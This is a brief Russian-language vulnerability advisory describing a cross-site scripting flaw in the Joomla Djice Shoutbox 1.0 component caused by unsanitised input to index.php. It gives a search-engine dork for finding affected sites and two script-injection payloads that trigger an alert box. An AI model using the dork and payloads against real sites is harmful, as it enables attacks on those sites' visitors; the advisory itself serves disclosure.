Программа: Joomla Djice Shoutbox 1.0

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных сценарием index.php. Атакующий может выполнить произвольный сценарий в
браузере жертвы в контексте безопасности уязвимого сайта.

Эксплоит:

inurl: "index.php?option=com_djiceshoutbox"

"><script>alert(‘XaDoS’)</script>

или

‘">><script>alert(‘XSS By XaDoS’)</script>



Оставить мнение